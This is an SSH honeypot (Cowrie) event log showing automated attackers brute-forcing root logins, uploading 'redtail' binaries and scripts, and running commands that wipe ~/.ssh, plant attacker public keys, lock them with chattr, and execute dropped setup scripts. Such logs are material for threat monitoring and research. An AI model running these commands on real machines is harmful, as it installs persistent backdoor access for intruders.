{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:43:34.129669Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.login.success","username":"root","password":"Start1234","message":"login attempt [root/Start1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:43:34.637017Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:43:35.336673Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:43:35.337359Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:43:35.338278Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:35.450916Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:43:35.745136Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:43:35.745810Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:43:35.904700Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:35.905603Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":53642,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ef4ec3f8d0b","protocol":"ssh","message":"New connection: 199.195.253.95:53642 (1.2.3.4:22) [session: 2ef4ec3f8d0b]","sensor":"my-vps","timestamp":"2025-08-28T17:43:36.092520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:43:36.102058Z","src_ip":"199.195.253.95","session":"2ef4ec3f8d0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:43:36.303696Z","src_ip":"199.195.253.95","session":"2ef4ec3f8d0b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:37.296092Z","src_ip":"199.195.253.95","session":"2ef4ec3f8d0b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:38.572692Z","src_ip":"199.195.253.95","session":"2ef4ec3f8d0b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":54674,"dst_ip":"1.2.3.4","dst_port":22,"session":"e571ebc1bceb","protocol":"ssh","message":"New connection: 199.195.253.95:54674 (1.2.3.4:22) [session: e571ebc1bceb]","sensor":"my-vps","timestamp":"2025-08-28T17:43:38.825690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:43:38.834882Z","src_ip":"199.195.253.95","session":"e571ebc1bceb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:43:39.125173Z","src_ip":"199.195.253.95","session":"e571ebc1bceb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:43:40.029321Z","src_ip":"199.195.253.95","session":"e571ebc1bceb"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:40.214717Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:40.215815Z","src_ip":"199.195.253.95","session":"e571ebc1bceb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35618,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bfd5e6762a6","protocol":"ssh","message":"New connection: 212.227.235.229:35618 (1.2.3.4:22) [session: 9bfd5e6762a6]","sensor":"my-vps","timestamp":"2025-08-28T17:43:57.060596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:43:57.412190Z","src_ip":"212.227.235.229","session":"9bfd5e6762a6"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-28T17:43:57.413119Z","src_ip":"212.227.235.229","session":"9bfd5e6762a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35980,"dst_ip":"1.2.3.4","dst_port":22,"session":"56642f50f405","protocol":"ssh","message":"New connection: 212.227.235.229:35980 (1.2.3.4:22) [session: 56642f50f405]","sensor":"my-vps","timestamp":"2025-08-28T17:43:58.302022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:43:58.302711Z","src_ip":"212.227.235.229","session":"56642f50f405"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-28T17:44:01.634156Z","src_ip":"212.227.235.229","session":"56642f50f405"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvbnjuiop","message":"login attempt [root/zxcvbnjuiop] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:44:08.930271Z","src_ip":"212.227.235.229","session":"56642f50f405"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:09.192495Z","src_ip":"212.227.235.229","session":"56642f50f405"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51254,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cfc1394ff71","protocol":"ssh","message":"New connection: 212.227.235.229:51254 (1.2.3.4:22) [session: 3cfc1394ff71]","sensor":"my-vps","timestamp":"2025-08-28T17:44:09.307108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:44:09.308064Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T17:44:09.415924Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvbnjuiop","message":"login attempt [root/zxcvbnjuiop] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:44:09.741475Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.closed","duration":"15.7","message":"Connection lost after 15.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:12.736724Z","src_ip":"212.227.235.229","session":"9bfd5e6762a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:44:33.136499Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.137246Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.246972Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.355891Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.357871Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.360927Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.363310Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.365876Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.366895Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.closed","duration":"24.2","message":"Connection lost after 24.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:33.477246Z","src_ip":"212.227.235.229","session":"3cfc1394ff71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45368,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fb1b67e5c38","protocol":"ssh","message":"New connection: 212.227.125.160:45368 (1.2.3.4:22) [session: 8fb1b67e5c38]","sensor":"my-vps","timestamp":"2025-08-28T17:44:40.934814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:44:41.134621Z","src_ip":"212.227.125.160","session":"8fb1b67e5c38"}
